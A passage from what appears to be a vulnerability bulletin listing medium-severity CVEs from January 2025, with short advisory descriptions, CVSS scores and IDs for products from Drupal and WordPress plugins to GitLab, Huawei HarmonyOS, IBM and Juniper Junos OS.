Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Views SVG Animation allows Cross-Site Scripting (XSS).This issue affects Views SVG Animation: from 0.0.0 before 1.0.1. | 2025-01-09 | 5.4 | CVE-2024-13287 |
| Ella van Durpe--Slides & Presentations |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ella van Durpe Slides & Presentations allows Stored XSS.This issue affects Slides & Presentations: from n/a through 0.0.39. | 2025-01-07 | 6.5 | CVE-2025-22511 |
| Ella van Durpe--Slides & Presentations |
Missing Authorization vulnerability in Ella van Durpe Slides & Presentations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slides & Presentations: from n/a through 0.0.39. | 2025-01-07 | 5.4 | CVE-2025-22534 |
| endortrails--Sell Media |
The Sell Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sell_media_search_form_gutenberg' shortcode in all versions up to, and including, 2.5.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11777 |
| Envato--Envato Elements |
Server-Side Request Forgery (SSRF) vulnerability in Envato Envato Elements allows Server Side Request Forgery.This issue affects Envato Elements: from n/a through 2.0.14. | 2025-01-07 | 4.1 | CVE-2024-56275 |
| Eric Franklin--Video Embed Optimizer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eric Franklin Video Embed Optimizer allows Stored XSS.This issue affects Video Embed Optimizer: from n/a through 1.0.0. | 2025-01-07 | 6.5 | CVE-2025-22554 |
| Eric McNiece--EMC2 Alert Boxes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eric McNiece EMC2 Alert Boxes allows Stored XSS.This issue affects EMC2 Alert Boxes: from n/a through 1.3. | 2025-01-07 | 6.5 | CVE-2025-22365 |
| estatik--Estatik Mortgage Calculator |
The Estatik Mortgage Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'color' parameter in all versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-9354 |
| Etruel Developments LLC--WP Delete Post Copies |
Missing Authorization vulnerability in Etruel Developments LLC WP Delete Post Copies allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Delete Post Copies: from n/a through 5.5. | 2025-01-07 | 5.4 | CVE-2025-22541 |
| Faaiq--Pretty Url |
Cross-Site Request Forgery (CSRF) vulnerability in Faaiq Pretty Url allows Cross Site Request Forgery.This issue affects Pretty Url: from n/a through 1.5.4. | 2025-01-07 | 4.3 | CVE-2025-22563 |
| Fahad Mahmood--WP Docs |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood WP Docs allows Stored XSS.This issue affects WP Docs: from n/a through 2.2.1. | 2025-01-07 | 5.9 | CVE-2024-56288 |
| FilaThemes--Education LMS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FilaThemes Education LMS allows Stored XSS.This issue affects Education LMS: from n/a through 0.0.7. | 2025-01-07 | 6.5 | CVE-2025-22334 |
| FlickDevs--News Ticker Widget for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FlickDevs News Ticker Widget for Elementor allows Stored XSS.This issue affects News Ticker Widget for Elementor: from n/a through 1.3.2. | 2025-01-09 | 6.5 | CVE-2025-22812 |
| flickrocket--WooCommerce Digital Content Delivery (incl. DRM) FlickRocket |
The WooCommerce Digital Content Delivery (incl. DRM) - FlickRocket plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'start_date' and 'end_date' parameters in all versions up to, and including, 4.74 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12438 |
| flowdee--ClickWhale Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages |
The ClickWhale - Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-11 | 6.1 | CVE-2024-11327 |
| formaloo--Formaloo Form Maker & Customer Analytics for WordPress & WooCommerce |
The Formaloo Form Maker & Customer Analytics for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'address' parameter in all versions up to, and including, 2.1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11934 |
| FreeType--FreeType |
FreeType 2.8.1 has a signed integer overflow in cf2_doFlex in cff/cf2intrp.c. | 2025-01-10 | 4 | CVE-2025-23022 |
| galdub--Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups |
The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in the class-cx-rest.php file in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create 100% off coupons, delete posts, delete leads, and update coupon statuses. | 2025-01-11 | 5.4 | CVE-2024-12204 |
| geotargetly--Geo Content |
The Geo Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'geotargetlygeocontent' shortcode in all versions up to, and including, 6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11887 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions starting from 17.4 prior to 17.5.5, starting from 17.6 prior to 17.6.3, and starting from 17.7 prior to 17.7.1. Under certain conditions, access tokens may have been logged when API requests were made in a specific manner. | 2025-01-08 | 6.5 | CVE-2025-0194 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions starting from 15.5 before 17.5.5, 17.6 before 17.6.3, and 17.7 before 17.7.1, in which unauthorized users could manipulate the status of issues in public projects. | 2025-01-08 | 4.3 | CVE-2024-12431 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.4 prior to 17.5.5, starting from 17.6 prior to 17.6.3, and starting from 17.7 prior to 17.7.1. When a user is created via the SAML provider, the external groups setting overrides the external provider configuration. As a result, the user may not be marked as external thereby giving those users access to internal projects or groups. | 2025-01-09 | 4.2 | CVE-2024-13041 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions starting from 15.7 prior to 17.5.5, starting from 17.6 prior to 17.6.3, and starting from 17.7 prior to 17.7.1. It was possible to trigger a DoS by creating cyclic references between epics. | 2025-01-09 | 4.3 | CVE-2024-6324 |
| grandy--GDY Modular Content |
The GDY Modular Content plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.9.91. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12153 |
| Gravity Master--PDF Catalog Woocommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gravity Master PDF Catalog Woocommerce allows DOM-Based XSS.This issue affects PDF Catalog Woocommerce: from n/a through 2.0. | 2025-01-09 | 6.5 | CVE-2025-22809 |
| Grocy project--Grocy |
Grocy through 4.3.0 allows remote attackers to obtain sensitive information via direct requests to pages that are not shown in the UI, such as calendar and recipes. | 2025-01-06 | 4.3 | CVE-2024-55075 |
| Guangzhou Huayi Intelligent Technology--Jeewms |
A vulnerability, which was classified as critical, has been found in Guangzhou Huayi Intelligent Technology Jeewms up to 20241229. This issue affects the function saveOrUpdate of the file org/jeecgframework/web/cgform/controller/build/CgFormBuildController. java. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 20250101 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-11 | 6.3 | CVE-2025-0391 |
| Guangzhou Huayi Intelligent Technology--Jeewms |
A vulnerability, which was classified as critical, was found in Guangzhou Huayi Intelligent Technology Jeewms up to 20241229. Affected is the function datagridGraph of the file /graphReportController.do. The manipulation of the argument store_code leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 20250101 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-11 | 6.3 | CVE-2025-0392 |
| Guangzhou Huayi Intelligent Technology--Jeewms |
A vulnerability classified as critical was found in Guangzhou Huayi Intelligent Technology Jeewms up to 20241229. This vulnerability affects unknown code of the file /wmOmNoticeHController.do. The manipulation leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 20250101 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-11 | 5.3 | CVE-2025-0390 |
| Gutentor--Gutentor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gutentor Gutentor allows DOM-Based XSS.This issue affects Gutentor: from n/a through 3.4.0. | 2025-01-07 | 6.5 | CVE-2025-22293 |
| HashThemes--Hash Elements |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HashThemes Hash Elements.This issue affects Hash Elements: from n/a through 1.4.9. | 2025-01-07 | 6.5 | CVE-2025-22296 |
| hassantafreshi--Easy Form Builder WordPress plugin form builder: contact form, survey form, payment form, and custom form builder |
The Easy Form Builder - WordPress plugin form builder: contact form, survey form, payment form, and custom form builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the 'add_form_Emsfb' AJAX action in all versions up to, and including, 3.8.8 due to insufficient input sanitization and output escaping and missing authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-12112 |
| HasThemes--Free WooCommerce Theme 99fy Extension |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes Free WooCommerce Theme 99fy Extension allows Stored XSS.This issue affects Free WooCommerce Theme 99fy Extension: from n/a through 1.2.8. | 2025-01-09 | 6.5 | CVE-2025-22801 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by a session fixation vulnerability. Cyber-criminals can exploit this by sending crafted URLs with a session token to access the victim's login session. | 2025-01-11 | 6.8 | CVE-2024-42170 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by a session fixation vulnerability. Cyber-criminals can exploit this by sending crafted URLs with a session token to access the victim's login session. | 2025-01-11 | 6.4 | CVE-2024-42171 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by broken authentication. It allows attackers to compromise keys, passwords, and session tokens, potentially leading to identity theft and system control. This vulnerability arises from poor configuration, logic errors, or software bugs and can affect any application with access control, including databases, network infrastructure, and web applications. | 2025-01-11 | 5.3 | CVE-2024-42172 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by an improper password policy implementation vulnerability. Weak passwords and lack of account lockout policies allow attackers to guess or brute-force passwords if the username is known. | 2025-01-11 | 4.8 | CVE-2024-42173 |
| Hitesh Patel--Metadata SEO |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hitesh Patel Metadata SEO allows Stored XSS.This issue affects Metadata SEO: from n/a through 2.3. | 2025-01-07 | 6.5 | CVE-2025-22516 |
| Hive Support--Hive Support WordPress Help Desk |
Missing Authorization vulnerability in Hive Support Hive Support - WordPress Help Desk allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hive Support - WordPress Help Desk: from n/a through 1.1.6. | 2025-01-07 | 4.3 | CVE-2025-22298 |
| hoststreamsell--WooCommerce HSS Extension for Streaming Video |
The WooCommerce HSS Extension for Streaming Video plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'videolink' parameter in all versions up to, and including, 3.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12214 |
| Huawei--HarmonyOS |
Path traversal vulnerability in the Medialibrary module Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. | 2025-01-08 | 6.2 | CVE-2023-52953 |
| Huawei--HarmonyOS |
Vulnerability of improper authentication in the ANS system service module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 6.5 | CVE-2023-52955 |
| Huawei--HarmonyOS |
Startup control vulnerability in the ability module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 6.2 | CVE-2024-54121 |
| Huawei--HarmonyOS |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 6.2 | CVE-2024-56435 |
| Huawei--HarmonyOS |
Vulnerability of improper memory address protection in the HUKS module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 6 | CVE-2024-56438 |
| Huawei--HarmonyOS |
Permission control vulnerability in the Connectivity module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 6.2 | CVE-2024-56440 |
| Huawei--HarmonyOS |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 6.2 | CVE-2024-56443 |
| Huawei--HarmonyOS |
Vulnerability of improper access control in the home screen widget module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 6.7 | CVE-2024-56448 |
| Huawei--HarmonyOS |
Privilege escalation vulnerability in the Account module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 6.6 | CVE-2024-56449 |
| Huawei--HarmonyOS |
Buffer overflow vulnerability in the component driver module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 6.3 | CVE-2024-56450 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 6.8 | CVE-2024-56453 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 6.8 | CVE-2024-56456 |
| Huawei--HarmonyOS |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 5.5 | CVE-2024-56436 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified in the widget framework module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 5.7 | CVE-2024-56437 |
| Huawei--HarmonyOS |
Vulnerability of native APIs not being implemented in the NFC service module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 5.5 | CVE-2024-56442 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 5.5 | CVE-2024-56452 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 5.5 | CVE-2024-56454 |
| Huawei--HarmonyOS |
Vulnerability of input parameters not being verified during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 5.5 | CVE-2024-56455 |
| Huawei--HarmonyOS |
Vulnerability of improper permission control in the Gallery module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 4.4 | CVE-2023-52954 |
| Huawei--HarmonyOS |
Race condition vulnerability in the distributed notification module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 4.1 | CVE-2024-54120 |
| Huawei--HarmonyOS |
UAF vulnerability in the device node access module Impact: Successful exploitation of this vulnerability may cause service exceptions of the device. | 2025-01-08 | 4.4 | CVE-2024-56434 |
| Huawei--HarmonyOS |
Race condition vulnerability in the Bastet module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 4.1 | CVE-2024-56441 |
| Huawei--HarmonyOS |
Instruction authentication bypass vulnerability in the Findnetwork module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-01-08 | 4.3 | CVE-2024-56445 |
| Huawei--HarmonyOS |
Vulnerability of variables not being initialized in the notification module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 4 | CVE-2024-56446 |
| Huurkalender--Huurkalender WP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Huurkalender Huurkalender WP allows Stored XSS.This issue affects Huurkalender WP: from n/a through 1.5.6. | 2025-01-07 | 6.5 | CVE-2025-22528 |
| IBM--App Connect Enterprise Certified Container |
IBM App Connect Enterprise Certified Container 7.1, 7.2, 8.0, 8.1, 8.2, 9.0, 9.1, 9.2, 10.0, 10.1, 11.0, 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 12.0, 12.1, 12.2, 12.3, and 12.4 operands running in Red Hat OpenShift do not restrict writing to the local filesystem, which may result in exhausting the available storage in a Pod, resulting in that Pod being restarted. | 2025-01-09 | 5.5 | CVE-2022-22491 |
| IBM--Concert Software |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, 1.0.2.1, and 1.0.3Â could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. | 2025-01-07 | 5.9 | CVE-2024-52366 |
| IBM--Concert Software |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, 1.0.2.1, and 1.0.3 could disclose sensitive system information to an unauthorized actor that could be used in further attacks against the system. | 2025-01-07 | 5.3 | CVE-2024-52367 |
| IBM--Concert Software |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, 1.0.2.1, and 1.0.3 could allow an authenticated user to inject malicious information or obtain information from log files due to improper log neutralization. | 2025-01-07 | 5.4 | CVE-2024-52891 |
| IBM--Concert Software |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, 1.0.2.1, and 1.0.3Â could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2025-01-07 | 5.3 | CVE-2024-52893 |
| IBM--Controller |
IBM Cognos Controller 11.0.0 through 11.0.1 and IBM Controller 11.1.0 is vulnerable to exposure of Artifactory API keys. This vulnerability allows users to publish code to private packages or repositories under the name of the organization. | 2025-01-07 | 6.5 | CVE-2024-28778 |
| IBM--Controller |
IBM Cognos Controller 11.0.0 through 11.0.1 and IBM Controller 11.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2025-01-07 | 4.3 | CVE-2022-22363 |
| IBM--Controller |
IBM Cognos Controller 11.0.0 through 11.0.1 and IBM Controller 11.1.0 could allow a remote attacker to obtain sensitive information when a stack trace is returned in the browser. | 2025-01-07 | 4.3 | CVE-2024-25037 |
| IBM--Db2 |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an information disclosure vulnerability as sensitive information may be included in a log file under specific conditions. | 2025-01-08 | 5.5 | CVE-2024-40679 |
| IBM--Jazz Foundation |
IBM Jazz Foundation 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-01-12 | 5.4 | CVE-2021-29669 |
| IBM--OpenPages |
IBM OpenPages 9.0 could allow an authenticated user to obtain sensitive information such as configurations that should only be available to privileged users. | 2025-01-09 | 5.4 | CVE-2024-43176 |
| IBM--Robotic Process Automation |
IBM Robotic Process Automation 21.0.0 through 21.0.7.19 and 23.0.0 through 23.0.19 could allow a remote attacker to obtain sensitive data that may be exposed through certain crypto-analytic attacks. | 2025-01-12 | 5.9 | CVE-2024-51456 |
| IBM--Security QRadar EDR |
IBM Security ReaQta 3.12 returns sensitive information in an HTTP response that could be used in further attacks against the system. | 2025-01-07 | 5.3 | CVE-2024-45640 |
| IBM--Security QRadar EDR |
IBM Security ReaQta 3.12Â could allow a privileged user to cause a denial of service by sending multiple administration requests due to improper allocation of resources. | 2025-01-07 | 4.9 | CVE-2024-45100 |
| IBM--Sterling B2B Integrator Standard Edition |
IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.5 and 6.2.0.0 through 6.2.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-01-06 | 6.4 | CVE-2024-31914 |
| IBM--Sterling B2B Integrator Standard Edition |
IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.5 and 6.2.0.0 through 6.2.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-01-06 | 5.5 | CVE-2024-31913 |
| IBM--watsonx.ai |
IBM watsonx.ai 1.1 through 2.0.3 and IBM watsonx.ai on Cloud Pak for Data 4.8 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-01-12 | 5.4 | CVE-2024-49785 |
| inc2734--Smart Custom Fields |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in inc2734 Smart Custom Fields allows Stored XSS.This issue affects Smart Custom Fields: from n/a through 5.0.0. | 2025-01-07 | 6.5 | CVE-2025-22308 |
| india-web-developer--WP Youtube Gallery |
The WP Youtube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12590 |
| infility--Infility Global |
The Infility Global plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the infility_global_ajax function in all versions up to, and including, 2.9.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options and potentially break the site. | 2025-01-07 | 6.5 | CVE-2024-11496 |
| infility--Infility Global |
The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'set_type' parameter in all versions up to, and including, 2.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12290 |
| instaform.ir-- |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in instaform.ir Ùرم ساز Ùرم اÙزار allows Stored XSS.This issue affects Ùرم ساز Ùرم اÙزار: from n/a through 2.0. | 2025-01-07 | 6.5 | CVE-2025-22524 |
| intergotelecom--WP Bulk SMS by SMS.to |
The WP - Bulk SMS - by SMS.to plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11434 |
| Jason Funk--Title Experiments Free |
Missing Authorization vulnerability in Jason Funk Title Experiments Free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Title Experiments Free: from n/a through 9.0.4. | 2025-01-09 | 4.3 | CVE-2025-22561 |
| Jason Funk--Title Experiments Free |
Cross-Site Request Forgery (CSRF) vulnerability in Jason Funk Title Experiments Free allows Cross Site Request Forgery.This issue affects Title Experiments Free: from n/a through 9.0.4. | 2025-01-07 | 4.3 | CVE-2025-22562 |
| jdsofttech--School Management System WPSchoolPress |
The School Management System - WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'cid' parameter in all versions up to, and including, 2.2.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Student/Parent-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-07 | 6.5 | CVE-2024-12332 |
| Jewel Theme--Image Hover Effects for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jewel Theme Image Hover Effects for Elementor allows Stored XSS.This issue affects Image Hover Effects for Elementor: from n/a through 1.0.2.3. | 2025-01-07 | 6.5 | CVE-2025-22323 |
| jleuze--Meteor Slides |
The Meteor Slides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slide_url_value' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12073 |
| Joe Motacek--ICS Button |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joe Motacek ICS Button allows Stored XSS.This issue affects ICS Button: from n/a through 0.6. | 2025-01-07 | 6.5 | CVE-2025-22574 |
| jonathankissam--Action Network |
The Action Network plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-12394 |
| Joomag.--WP Joomag |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joomag. WP Joomag allows DOM-Based XSS.This issue affects WP Joomag: from n/a through 2.5.2. | 2025-01-09 | 6.5 | CVE-2025-22827 |
| Joomla! Project--Joomla! CMS |
Various module chromes didn't properly process inputs, leading to XSS vectors. | 2025-01-07 | 6.1 | CVE-2024-40747 |
| Julien Crego--Boot-Modal |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Julien Crego Boot-Modal allows Stored XSS.This issue affects Boot-Modal: from n/a through 1.9.1. | 2025-01-07 | 6.5 | CVE-2025-22551 |
| Juniper Networks--Junos OS |
An Improper Control of a Resource Through its Lifetime vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker to cause a Denial-of-Service (DoS). On devices with SRv6 (Segment Routing over IPv6) enabled, an attacker can send a malformed BGP UPDATE packet which will cause the rpd to crash and restart. Continued receipt of these UPDATE packets will cause a sustained DoS condition. This issue affects iBGP and eBGP, and both IPv4 and IPv6 are affected by this vulnerability.This issue affects Junos OS: * All versions before 21.2R3-S9, * from 21.4 before 21.4R3-S10, * from 22.2 before 22.2R3-S5, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S3, * from 23.2 before 23.2R2-S2, * from 23.4 before 23.4R2; and Junos OS Evolved: * All versions before 21.2R3-S9-EVO, * from 21.4-EVO before 21.4R3-S10-EVO, * from 22.2-EVO before 22.2R3-S5-EVO, * from 22.3-EVO before 22.3R3-S4-EVO, * from 22.4-EVO before 22.4R3-S3-EVO, * from 23.2-EVO before 23.2R2-S2-EVO, * from 23.4-EVO before 23.4R2-EVO. | 2025-01-09 | 6.5 | CVE-2025-21593 |
| Juniper Networks--Junos OS |
An Out-of-Bounds Read vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, logically adjacent BGP peer sending a specifically malformed BGP packet to cause rpd to crash and restart, resulting in a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects systems configured in either of two ways: * systems with BGP traceoptions enabled * systems with BGP family traffic-engineering (BGP-LS) configured and can be exploited from a directly connected and configured BGP peer. This issue affects iBGP and eBGP with any address family configured, and both IPv4 and IPv6 are affected by this vulnerability. This issue affects: Junos OS: * All versions before 21.4R3-S9, * from 22.2 before 22.2R3-S5, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S5, * from 23.2 before 23.2R2-S3, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R1-S2, 24.2R2; Junos OS Evolved: * All versions before 21.4R3-S9-EVO, * from 22.2 before 22.2R3-S5-EVO, * from 22.3 before 22.3R3-S4-EVO, * from 22.4 before 22.4R3-S5-EVO, * from 23.2 before 23.2R2-S3-EVO, * from 23.4 before 23.4R2-S2-EVO, * from 24.2 before 24.2R1-S2-EVO, 24.2R2-EVO. This is a similar, but different vulnerability than the issue reported as CVE-2024-39516. | 2025-01-09 | 6.5 | CVE-2025-21600 |
| Juniper Networks--Junos OS |
